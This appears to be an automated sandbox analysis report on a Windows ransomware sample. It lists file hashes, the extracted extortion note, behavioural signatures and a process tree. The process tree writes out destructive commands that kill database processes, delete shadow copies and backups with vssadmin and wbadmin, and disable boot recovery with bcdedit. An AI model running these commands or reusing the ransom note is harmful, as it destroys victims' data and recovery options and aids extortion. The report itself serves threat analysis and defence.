Analysis

  • max time kernel
    153s
  • max time network
    159s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    27-02-2024 17:56

General

  • Target

    c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe

  • Size

    332KB

  • MD5

    0d5ccd706f75461b3fb9c56bc87b5c6f

  • SHA1

    0c3755209682d5632a5fb20143ea7d93be5dc5e8

  • SHA256

    c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1

  • SHA512

    9288cdd355d9a6fab846fda6b46ea6c67ec706e089c02d9718661b754bb45be020e97bd48d7876d82a525dfaedc17f6c2303f03160932ea4d6e915f085714131

  • SSDEEP

    6144:aY196WTQqBfFrQlVCuzw/322A1StYDBF+FTKtkV:R96eVFryVHzw/3XOfvtk

Score
10/10

Malware Config

Extracted

Path

C:\odt\How_to_back_files.html

Ransom Note
<html> <style type="text/css"> body { background-color: #f5f5f5; } h1, h3{ text-align: center; text-transform: uppercase; font-weight: normal; } /*---*/ .tabs1{ display: block; margin: auto; } .tabs1 .head{ text-align: center; float: top; padding: 0px; text-transform: uppercase; font-weight: normal; display: block; background: #81bef7; color: #DF0101; font-size: 30px; } .tabs1 .identi { font-size: 10px; text-align: center; float: top; padding: 15px; display: block; background: #81bef7; color: #DFDFDF; word-break: break-all; } .tabs .content { background: #f5f5f5; /*text-align: center;*/ color: #000000; padding: 25px 15px; font-size: 15px; font-weight: 400; line-height: 20px; } .tabs .content a { color: #df0130; font-size: 23px; font-style: italic; text-decoration: none; line-height: 35px; } .tabs .content .text{ padding: 25px; line-height: 1.2; } </style> <body> <div class="tabs1"> <div class="head" ><b>Your personal ID:</b></div> <div class="identi"> <span style="width:1000px; color: #ffffff; font-size: 10px;">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</span> <br> <!-- !!! dont changing this !!! --> </div> </div> <!-- --> <div class="tabs"> <!--tab--> <div class="tab"> <div id="tab-content1" class="content"> <div class="text"> <!--text data --> <b>/!\ YOUR COMPANY NETWORK HAS BEEN PENETRATED /!\</b><br> <b>All your important files have been encrypted!</b><br><br> <hr> Your files are safe! Only modified. (RSA+AES)<br><br> ANY ATTEMPT TO RESTORE YOUR FILES WITH THIRD-PARTY SOFTWARE<br> WILL PERMANENTLY CORRUPT IT.<br> DO NOT MODIFY ENCRYPTED FILES.<br> DO NOT RENAME ENCRYPTED FILES.<br><br> No software available on internet can help you. We are the only ones able to<br> solve your problem.<br><br> We gathered highly confidential/personal data. These data are currently stored on<br> a private server. 
This server will be immediately destroyed after your payment.<br> If you decide to not pay, we will release your data to public or re-seller.<br> So you can expect your data to be publicly available in the near future..<br><br> We only seek money and our goal is not to damage your reputation or prevent<br> your business from running.<br><br> You will can send us 2-3 non-important files and we will decrypt it for free<br> to prove we are able to give your files back.<br><br> <!--text data --> <hr> <b>Contact us for price and get decryption software.</b><br><br> <hr> <b>email:</b><br> <a href="[email protected] ">[email protected] </a> <br> <a href="[email protected] ">[email protected] </a> <br> <p>* To contact us, create a new free email account on the site: <a href="https://protonmail.com">protonmail.com <br> <b> IF YOU DON'T CONTACT US WITHIN 72 HOURS, PRICE WILL BE HIGHER.</b><br> </div> </div> </div> <!--tab--> <!--text data --> </div> </div> <!--tab--> </div> </div> </body> </html>
Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Renames multiple (343) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Deletes System State backups 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Deletes system backups 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 3 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 14 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 32 IoCs
  • Suspicious use of AdjustPrivilegeToken 36 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    PID:3300
    • C:\Users\Admin\AppData\Local\Temp\c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe
      "C:\Users\Admin\AppData\Local\Temp\c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe"
      2⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Enumerates connected drives
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      • System policy modification
      PID:3376
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1096
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c rem Kill "SQL"
          4⤵
          PID:4924
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1884
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4796
          • C:\Windows\system32\taskkill.exe
            taskkill -f -im sqlbrowser.exe
            5⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3864
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2688
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3832
          • C:\Windows\system32\taskkill.exe
            taskkill -f -im sql writer.exe
            5⤵
            • Kills process with taskkill
            PID:4404
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3624
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2356
          • C:\Windows\system32\taskkill.exe
            taskkill -f -im sqlserv.exe
            5⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1472
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:212
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3088
          • C:\Windows\system32\taskkill.exe
            taskkill -f -im msmdsrv.exe
            5⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1316
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1684
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3400
          • C:\Windows\system32\taskkill.exe
            taskkill -f -im MsDtsSrvr.exe
            5⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:996
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3276
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4292
          • C:\Windows\system32\taskkill.exe
            taskkill -f -im sqlceip.exe
            5⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2816
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4524
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3500
          • C:\Windows\system32\taskkill.exe
            taskkill -f -im fdlauncher.exe
            5⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1004
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2420
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4488
          • C:\Windows\system32\taskkill.exe
            taskkill -f -im Ssms.exe
            5⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:880
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
        3⤵
        PID:4348
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
          4⤵
          PID:2260
          • C:\Windows\system32\taskkill.exe
            taskkill -f -im SQLAGENT.EXE
            5⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1036
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
        3⤵
        PID:4536
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
          4⤵
          PID:768
          • C:\Windows\system32\taskkill.exe
            taskkill -f -im fdhost.exe
            5⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3156
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
        3⤵
        PID:2668
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
          4⤵
          PID:3904
          • C:\Windows\system32\taskkill.exe
            taskkill -f -im ReportingServicesService.exe
            5⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4612
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
        3⤵
        PID:3076
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
          4⤵
          PID:3092
          • C:\Windows\system32\taskkill.exe
            taskkill -f -im msftesql.exe
            5⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4356
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
        3⤵
        PID:4412
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
          4⤵
          PID:4196
          • C:\Windows\system32\taskkill.exe
            taskkill -f -im pg_ctl.exe
            5⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1316
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe
        3⤵
        PID:3836
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c taskkill -f -impostgres.exe
          4⤵
          PID:2220
          • C:\Windows\system32\taskkill.exe
            taskkill -f -impostgres.exe
            5⤵
            • Kills process with taskkill
            PID:1684
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
        3⤵
        PID:4824
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
          4⤵
          PID:4344
          • C:\Windows\system32\net.exe
            net stop MSSQLServerADHelper100
            5⤵
            PID:3276
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 stop MSSQLServerADHelper100
              6⤵
              PID:4424
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS
        3⤵
        PID:2284
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS
          4⤵
          PID:1484
          • C:\Windows\system32\net.exe
            net stop MSSQL$ISARS
            5⤵
            PID:4132
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 stop MSSQL$ISARS
              6⤵
              PID:3228
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW
        3⤵
        PID:4516
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW
          4⤵
          PID:332
          • C:\Windows\system32\net.exe
            net stop MSSQL$MSFW
            5⤵
            PID:2932
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 stop MSSQL$MSFW
              6⤵
              PID:2084
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS
        3⤵
        PID:2260
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS
          4⤵
          PID:2948
          • C:\Windows\system32\net.exe
            net stop SQLAgent$ISARS
            5⤵
            PID:2480
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 stop SQLAgent$ISARS
              6⤵
              PID:2980
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW
        3⤵
        PID:3124
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW
          4⤵
          PID:3156
          • C:\Windows\system32\net.exe
            net stop SQLAgent$MSFW
            5⤵
            PID:4972
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 stop SQLAgent$MSFW
              6⤵
              PID:1956
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser
        3⤵
        PID:2916
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c net stop SQLBrowser
          4⤵
          PID:4900
          • C:\Windows\system32\net.exe
            net stop SQLBrowser
            5⤵
            PID:3332
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 stop SQLBrowser
              6⤵
              PID:1132
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS
        3⤵
        PID:1548
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c net stop REportServer$ISARS
          4⤵
          PID:4604
          • C:\Windows\system32\net.exe
            net stop REportServer$ISARS
            5⤵
            PID:3840
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 stop REportServer$ISARS
              6⤵
              PID:4208
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter
        3⤵
        PID:1100
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c net stop SQLWriter
          4⤵
          PID:456
          • C:\Windows\system32\net.exe
            net stop SQLWriter
            5⤵
            PID:972
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 stop SQLWriter
              6⤵
              PID:1556
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
        3⤵
        PID:996
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
          4⤵
          PID:3104
          • C:\Windows\system32\vssadmin.exe
            vssadmin.exe Delete Shadows /All /Quiet
            5⤵
            • Interacts with shadow copies
            PID:1468
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
        3⤵
        PID:3308
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
          4⤵
          PID:4292
          • C:\Windows\system32\wbadmin.exe
            wbadmin DELETE SYSTEMSTATEBACKUP
            5⤵
            • Deletes System State backups
            PID:3532
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
        3⤵
        PID:32
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
          4⤵
          PID:4692
          • C:\Windows\system32\wbadmin.exe
            wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
            5⤵
            PID:4836
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
        3⤵
        PID:2220
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
                                                                                                                      4⤵
                                                                                                                        PID:3836
                                                                                                                        • C:\Windows\system32\wbadmin.exe
                                                                                                                          wbadmin delete backup -keepVersion:0 -quiet
                                                                                                                          5⤵
                                                                                                                          • Deletes system backups
                                                                                                                          • Drops file in Windows directory
                                                                                                                          PID:4396
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
                                                                                                                      3⤵
                                                                                                                        PID:4532
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
                                                                                                                          4⤵
                                                                                                                            PID:3396
                                                                                                                            • C:\Windows\system32\bcdedit.exe
                                                                                                                              bcdedit.exe /set {default} recoverynabled No
                                                                                                                              5⤵
                                                                                                                              • Modifies boot configuration data using bcdedit
                                                                                                                              PID:1096
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                          3⤵
                                                                                                                            PID:3564
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                              4⤵
                                                                                                                                PID:740
                                                                                                                                • C:\Windows\system32\bcdedit.exe
                                                                                                                                  bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                                  5⤵
                                                                                                                                  • Modifies boot configuration data using bcdedit
                                                                                                                                  PID:2948
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
                                                                                                                              3⤵
                                                                                                                                PID:2884
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
                                                                                                                                  4⤵
                                                                                                                                    PID:4496
                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                      wmic.exe SHADOWCOPY /nointeractive
                                                                                                                                      5⤵
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:3960
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe
                                                                                                                                \\?\C:\Users\Admin\AppData\Local\Temp\c6d09776e748f0fe1cec9d4af9f3154c9f84026c27e1a59c0d48bcaf17b89ce1.exe -network
                                                                                                                                2⤵
                                                                                                                                • System policy modification
                                                                                                                                PID:3292
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c pause
                                                                                                                                  3⤵
                                                                                                                                    PID:1472
                                                                                                                              • C:\Windows\system32\vssvc.exe
                                                                                                                                C:\Windows\system32\vssvc.exe
                                                                                                                                1⤵
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:2716
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4092 --field-trial-handle=2276,i,11674642242468042059,14711253743544118298,262144 --variations-seed-version /prefetch:8
                                                                                                                                1⤵
                                                                                                                                  PID:4136

Network

MITRE ATT&CK Enterprise v15

Downloads

• C:\odt\How_to_back_files.html
  Filesize: 4KB
  MD5: 6fedb1c2ef1dde2da864bf98b271675b
  SHA1: 1393fd16b3c6468e6dbd009e90644d51eaff7ecb
  SHA256: c2ec79ee0c21c94c4c68339e5e569ef2e8d2d716fe3b9ba22070699b6a2499ca
  SHA512: 5f3f2c1f4dc7a7761c70dd996a152616d8a948e577ff451330df6f8aa0349fad5c82b021f73fa3d880a647094a6fb217c14c11ffee925a11136af8bb139d8e64